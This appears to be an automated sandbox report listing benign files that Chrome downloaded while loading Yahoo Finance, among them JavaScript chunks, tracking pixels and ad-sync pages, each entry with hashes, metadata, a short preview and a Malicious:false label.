                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:RIFF.Q..WEBPVP8X.... ...c.....ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..VP8 .O.......*d...>q..F$...2..X...d;^.Q.......W.9.......s...+...?m?8}!.n........V/...?h.i=..%=......e....w.....O....?..s=...k$.?.^......?....f..;.3.....?......?....S.......w......z......_.}<......?......{..'.....P.;.........}=~......#.W._N...........\....pN...{.r...u'..S.L.Z.v.<.=.g9......o.`..N._./.A/[.oG$..Hj...Y.A...k.md_......._.T.!U.n.{ ).k.....r..~`.s.0.j.].e..{.+g`...5{.......e...../.....~.....:.,V.(S....#
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:C source, Unicode text, UTF-8 text, with very long lines (36318)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):56360
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.432617808538551
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:1536:aHqYoG4TPr0wG+ngVenNbgpvR56W7ewDn5:YlV7JD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:3D965EC029EFDCB46AE9A9B14D22A253
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:50436A04286E0A84560ADB00ECF2CE4C83C188A9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:61C1D0A8A053FFB5155C53ED9409621A51C9E46412FC59AB1F5F158787E679BC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:4FD38322A5F8C192E2FA759E2D18913EBB82119A6282295439749F2834E2B51B6B176187EB8FFF1459BCA911A462E8AACC00CB059771BB8F944F3DD8472B64D2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:function Br(t){return typeof t=="number"}60*new Date().getTimezoneOffset()*1e3;const Hn=/(\d+)px/i;function zr(t){return+Hn.exec(t)[1]}function Lr(t,e){return Math.ceil(t.measureText(e.replace(/\d/gi,"0")).width)}function qr(t,e,n,r="transparent"){t.clearRect(0,0,e,n),r&&(t.fillStyle=r,t.fillRect(0,0,e,n))}function Gr(t,...e){return e.forEach(n=>{n!==null&&typeof n=="object"&&Object.keys(n).forEach(r=>{n[r]!==void 0&&(t[r]=n[r])})}),t}const Lt=typeof window<"u"&&window.XDomainRequest,qt=typeof window>"u"||"withCredentials"in new XMLHttpRequest;function Wr(t,e){const{host:n="https://query1.finance.yahoo.com",path:r,partner:i="",query:o}=t;o.corsDomain=window.location.host,i&&(o[".tsrc"]=i);const a=`${n}${r}?${function(f){return Object.keys(f).map(c=>{const h=f[c],p=Array.isArray(h)?h.join(","):h;if(p!=null)return`${c}=${encodeURIComponent(p)}`}).filter(Boolean).join("&")}(o)}`,l=function(f){let c;return qt?(c=new XMLHttpRequest,c.open("GET",f,!0)):Lt&&(c=new Lt,c.open("GET",f)),c}(a);if
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 260 x 340
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):539840
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):7.950660003114956
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12288:OqzGmFxefUFk3+6w/AuS4Hf0FzU/VF4HxHi1u2k0SwU1TKd5I/Z+aC10n/:OqzGmfeMFF6buloUNGicgd8+J0n/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:2FB9D43C74752389405ABC1A5814B44A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:BD551A3693F34693083D37EEE3113D667CE4F3C4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:7A18441E184306E7F51C5493C0C17F676C73E12F518DC468DCB565B25D90FC41
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:D0CED802BD8B03554E538D1316CC37EEFA4E0CBA33E54242BA36F4C1A3D1B991135208B54064499E571A21562AEFC67DBBE691B38E333148CCAB2518B229AA80
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/pv/static/img/icon-flame-light-202303010352.gif
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a..T.......................................................................U..R..Q..O........K..M..N..N..O..P..Q..Q..S..U..N................^<.mC.N..O..L".Q..S..[..M.....d.d?...pA.iM.h/.i........f...........................................................................................................w..o.rW.S..U..O..Q..S..^$.`0.M..N..O.....................}.hN.X5.X..o>.U..S..P..R..N...n.M..Q.............M%.W..r5..W..P..e..d.Y4.._&.Z$......v._=.^,.pR.Y#.kB.f5.}.O....R..S..S..}D............`@.hC.`3.....^5.U$.X..M"....M..U%.U!.a4.M..Q..M .N..N..Q..O..O..Q..P..U..U.........hD.w\...^<.uR.`1.z.]2.Z+.~.X).vQ.W..k...U..P...b.P...v.t.W..v..V.].pP...P..X"....X*.{U........X,.f.v`.....^..vQ.L..L.....N).jN.|].N..{N.qO.................!..NETSCAPE2.0.....!.)Optimized with https://ezgif.com/optimize.!.......,......T....................H........L..............L*.....J.....j..........N....................(8HXhx..........)9IYiy..........*:JZjz
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (717)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):786
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.219841148069385
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:24:0pRlddWZgvIlRkJo/Vu6MO3RctoHwIfATqckxg7iQD8rnaS4NM:0RddRvIlail3u21fATqc50raRNM
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:FB5A4594B9FFEF704D61BB6E6F80F145
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:B5CE60A22B42FCD31FE8B2810AAA277D545BE43B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:3C30F0F816ADA3A1410045D740A98E4D2FAF07FC74FFC0430678B21ABBD05138
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:77C63E1249E4BDF2DE43C74531A64E0AFE7305662BFA46252C432318B374CE7B0A6FC24645A5FDD5E9A4B18D4D924BF74E970B6E64D20B45DFBA263E51AD5FB4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://tsdtocl.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:<!doctype html>.<html>.<head>.<script>.!function(){var e="tsdtocl",t="!-#@",a=2;try{var n=function t(a,n){return n.namespace=e,n.id=a,parent.postMessage(JSON.stringify(n),"*"),n},r=function e(r,s,c){try{if(void 0===c||void 0===r||void 0===s)throw 0;var i=localStorage.getItem(s),o=i?i.split(t):[];if(-1!==o.indexOf(c))return n(r,{success:!0,wasAppended:!1});o.push(c);var d=o.slice(-a).join(t);localStorage.setItem(s,d);var u=localStorage.getItem(s);return n(r,{value:d,wasAppended:!0,success:u===d})}catch(e){return n(r,{success:!1})}},s=function t(a){var n;try{n=JSON.parse(a.data)}catch(e){}if(n&&n.namespace===e&&"append"===n.action)return r(n.id,n.key,n.value)};window.self!==window.top&&window.addEventListener("message",s,!1)}catch(e){}}();</script>.</head>.<body></body>.</html>
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):37
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.628108095241738
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:XPY3V+AMCDUgav:/Yl+AMnv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:564ADA9EE3603B4F14C06CEF9190C4FA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:70263BBDC39DECB3FE7EA013179FA0F0AB1A54B2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:66E77EAB0A0D1F48D9A6E8AFA5479B74C5762370BEAE0F9FAE70242C99E27206
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:5BE5BE79B8FE77B35334CFFDD65385FDC031442E7D6FB98E7CE1757F26925C12F9A79F0512BEA596625E76DED52CAD69D7D6495766085739A4E9EF6AC6B0F2FD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/assets/Header.BvCA0Mhu.css
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.placeholder.yf-6nfr06{height:143px}.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://s.yimg.com/g/images/spaceball.gif
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (16575)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):16576
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.510500578761302
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:384:GgIXfFBEbfnfunhg7E7GUcxCv3xg3wDLmy/LD1Py05Cc4yqqkbD:yXNKbfnfunyE8Qv3xg3wDL/v8aCzy/oD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:4E9BCE5EE9CC226344BA5C006193EB26
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:C52563D9B445685C62983F1985B71CF48F7694B6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:6D563FF7A56A4967A95B3508D961791F0B3778A0230FFA5485B795C4E305D0AE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:100351ABCE899C69DB2507251589463C4EB5F7D1021581B48B4E424B03076BDA84873AEB9F3E62D827C15CE5B2318CEFA3857FBB23E755F1DDD7981B7B7262A5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as Le,e as w,b as G,d as I,f as R,i as _,j as B,q as y,k as P,l as h,x as fe,p as F,t as $,h as j,L as oe,m as Q,n as re,O as pe,G as Se,v as We,Q as ke,S as ve}from"./scheduler.Dsuh-FKt.js";import{S as He,i as Ue,c as J,b as X,m as Z,g as ae,a as A,e as ne,t as D,d as x,h as ye}from"./index.CvwOawEI.js";import{c as Ge,g as Be,a as be,t as W,e as Ee,N as ie,v as Te}from"./commonUtil.BWwawKjd.js";import{l as Pe,S as Ye}from"./loadIndustry.DEzBPHyD.js";import{L as ze}from"./Link.vSNQugO0.js";import{S as $e}from"./SectionHeader.NLJaoS9L.js";import{e as q}from"./each.CI2tb2RB.js";import{S as je,O as qe}from"./Select.DMUNtRO-.js";import{b as Qe}from"./i13nUtil.8E8_gCdn.js";import{d as ce}from"./quoteUtil.C6mXO8A-.js";import{f as Fe,l as Je}from"./logUtil.CCV3qKPL.js";import{S as Xe}from"./SkeletonLoader.D0M7dqCu.js";import Ze from"./ErrorMsg.Cn69Klh6.js";const we="loadSector";async function xe(n,{sectorName:e,silent:r=!1,withReturns:t=!1,critical:l=!0}={}){const[o]=await Ge(["secto
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):46
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.43085190156809
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:OC0hNejBWk9JyiA:OC0hNuB7A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:9ACA9D15ADAFBE7AAECCAB50F115CD8B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:0FAF57FCB79A2B2D7F4161FFAFB7D9679D3F5DF0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:189B8ED64093B12937354B2EF71CCF1DF59690D90432241A10FE1CB25000ACBA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:A561D48D340192C05E37C089CEE1BB3FE00553FCC055C478C86A7C43C41A6C2CF740E07F678D09025D8B72E2D7E26D9F4E17A20BA2F0B24D559928DAAB61AD94
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://gum.criteo.com/sync?c=72&r=2&j=TRC.getRTUS&us_privacy=1YNN&gdpr=0&gdpr_consent=&gdpr_pd=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:TRC.getRTUS({"status":"Unknown","userid":""});
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (2820)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):2821
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.445615695759054
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:48:IAO9qd6fBd571ikI0RoB3yPivwpnjZ287E4PiiTY5ekWdRhBOGqAf9J3e4e4PueY:IAO9c65r71SBBCRhjJ7E4RY5uTGG7l0x
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:98F6F724D006F0EF976223B679E04659
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:EE85633C42A01B638FA6FDEDDA035C2CCE5DED20
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:1D65D5CDE85C70282FC0A906C75BA60684FFEE5450DE3F1F4A53D1FC68D06B40
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:2C39E467662113B30E9BCF9A2FFF7201F6A94E13729098C50325E9C08B02D71701836B55A3A8AA80C7AECDDB413162FDBC1F17024EBFDAE17F2C056C744C0E97
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/Switch.5Dhu_-MN.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{s as F,A as _,e as S,t as G,b as O,d as y,f as T,h as U,j as W,i as C,B as R,R as D,L as f,q as k,O as M,k as H,l as B,G as N,m as J,n as L,v as K,_ as q,W as Q}from"./scheduler.Dsuh-FKt.js";import{g as V}from"./spread.CgU5AtxT.js";import{S as X,i as Y}from"./index.CvwOawEI.js";import{b as Z}from"./i13nUtil.8E8_gCdn.js";function v(t){let e,i,o,s,d,h,c,u,m=[{type:"checkbox"},{role:"switch"},{class:"switch-inpt"},{id:d=`switch-${t[9]}`},t[11]],b={};for(let a=0;a<m.length;a+=1)b=_(b,m[a]);return{c(){e=S("label"),i=G(t[4]),o=O(),s=S("input"),this.h()},l(a){e=y(a,"LABEL",{for:!0,class:!0});var n=T(e);i=U(n,t[4]),o=W(n),s=y(n,"INPUT",{type:!0,role:!0,class:!0,id:!0}),n.forEach(C),this.h()},h(){R(s,b),(t[0]===void 0||t[1]===void 0)&&D(()=>t[14].call(s)),f(s,"yf-xyblh0",!0),k(e,"for",`switch-${t[9]}`),k(e,"class",h=M(`switch-label sz-${t[3]} label-${t[5]} ${t[2]}`)+" yf-xyblh0"),f(e,"labelRight",t[8]),f(e,"labelBold",t[6]),f(e,"spaceBetween",t[7])},m(a,n){H(a,e,n),B(e,i),B(e,o),B(e,s),s
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://beacon-ams3.rubiconproject.com/beacon/d/679c2c06-d594-4cfd-a331-f2cea2d2c21e?oo=0&accountId=17250&siteId=539018&zoneId=3323074&sizeId=15&e=6A1E40E384DA563BD31B919128F94D31FB042EE37F9B05D848CEB4C104200354B42B2612BFF3CAE5D5468EF0B21E05606256DD5F637309480C57D9A9B11FE2F091F977CCA52975D8123F4BC77F95DF3763AF685AF18256F352818FE89C133E1AE68F7D3CF18DF1CD01A7FDFFFAF43A2DE1501A5C29ACF5C995BCEA9A1A431B34
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (580)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):779
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.488300054852908
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:12:2ebxkC6DVU4dxhwVVIEOJlxThUscuSkdeQxkHtnLEOkm+lnOBIdNcDgXoQL:2e2C6hHfhiVIr/Fdc2dGtVpEdNwg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:69EB24169A08F74454973591C8F44BA0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:3FC98E29FD8F639EFC560398C84CBE034FE3444C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:1DC306D5EDF3FFEBCBF3173439EAB72650C51B75309646312BF18EC2481D6A89
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:FF142574FD85E8C4A6161D5597889D96CCAE47676D41305B74633AEBF85F9A51298112ABDE5901E674E1F1438CD3637E753147961EC5D17886059402512C3AB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://yahoo-bidout-d.openx.net/w/1.0/pd?gdpr=0&gdpr_consent=&us_privacy=1YNN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:<html>.<head><title>Pixels</title></head>.<body>.<script>if("browsingTopics"in document&&document.featurePolicy.allowsFeature("browsing-topics"))document.browsingTopics()</script>..<img src="https://id.rlcdn.com/709996.gif"><img src="https://idpix.media6degrees.com/orbserv/hbpix?pixId=856286&pcv=125&ptid=23&tpuv=00&tpu=2577aec7-5881-1f21-a93e-325337185d85"><img src="https://sync.srv.stackadapt.com/sync?nid=268"><img src="https://b1sync.zemanta.com/usersync/openx?puid=a217410b-ab91-0b95-0924-e56231c5c33c&cb=https%3A%2F%2Fus-u.openx.net%2Fw%2F1.0%2Fsd%3Fid%3D560843120%26val%3D__ZUID__"><img src="https://rtb.openx.net/sync/dds"><img src="https://sync.ipredictive.com/d/sync/cookie/generic?https://us-u.openx.net/w/1.0/sd?id=537073028&val=${ADELPHIC_CUID}">..</body>.</html>.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (376)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):377
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.158638866697652
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:6:hS/ZMC1CfmlJVUhRi8f+qI83+IisOcGMlpSJA5W2ss7AqEKz2pM5N7RJvVQn8WCD:Qhz4miRNpzuIBlpygWTqX7Rj
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6CC824CCA762B639A39A63B1298481D4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:FBB688C1D81F745E38CA77892B3CF15FF5E0399C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:9ED7745CC0431A9EC4C19D5D0DD992728CD81F792B9109455FC8982D9A4A92F7
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:352DB8224B4ACC13F4FCF0EF4ACDE90A316B2396BCFD97AB1C905625CAF2F9867E7C71CB03941FE693FD0A1F736E4BE4F130A812EFDD0C32A3CD5F8885CE83C9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://finance.yahoo.com/assets/_app/immutable/chunks/seoUtil.BURv1pYY.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:import{F as r}from"./commonUtil.BWwawKjd.js";const a=t=>({"@context":"https://schema.org","@type":"BreadcrumbList",itemListElement:t.map((e,i)=>({"@type":"ListItem",position:i+1,name:e.title,item:e.href.startsWith("/")?new URL(e.href,r).toString():e.href}))});function o(t){return t?`<script type="application/ld+json">${JSON.stringify(t)}<\/script>`:""}export{o as c,a as g};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):86
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):4.234496061572304
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:3:yionv//thPlE+tnM7WsrtxBllKxt8SFFFlpimp:6v/lhPfZM1U82FFlpimp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:6C6641B08F4BE6F479F1588AF08054B3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:8DA28B3146834C48FD843B108749191516D2A65D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:C2ECFF291918A3CAF0B7E470323E89F2A1F05B92E12A10649E598CACEBE62ACF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:BE544E3106F2B8E8083EF88B68806D6CEF2C4FBDD416C2E8EE17C88B42337A2972AF2C54CB8287A86ACCF6AC41CBCCA9A2E79F9E44417F5B144681D2B501E235
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    URL:https://pbs.yahoo.com/setuid?bidder=zeta_global_ssp&gdpr=0&gdpr_consent=&gpp=DBAA&gpp_sid=-1&f=i&uid=ua-224dbbae-81e8-387f-873d-9929b1cbe964
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Preview:.PNG........IHDR....................sBIT....|.d.....IDAT..c````........N.....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (10637), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Size (bytes):10637
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Entropy (8bit):5.2085652328167145
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SSDEEP:192:3rXOcuETuQtQlAQ6g/o5gaDMX5yZ909VeAMg5xmiSvxlAQ60omIcr7Q0QvCjlJlr:3+EiQdgw5TMXoyPMg5xmiwq0Icr78vC1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    MD5:397B59E3EECA4F747EA1F6FF6323154C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA1:C96E42A81F2F864313F6592688CA864D4578E3C3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-256:ACF529F550F2FDAAD913C10E6972344E43E07EAE8D5AA57B96FA30ED7C07ACC1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    SHA-512:CA0F4D6A4FF28A66868BC2387F737073D6CA26A429CBA97CE30B3F86A0820BF0355214618D95CFB5099AF3AF241F50440F3B870BB5C4D26275EFCB93772B8318
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Malicious:false
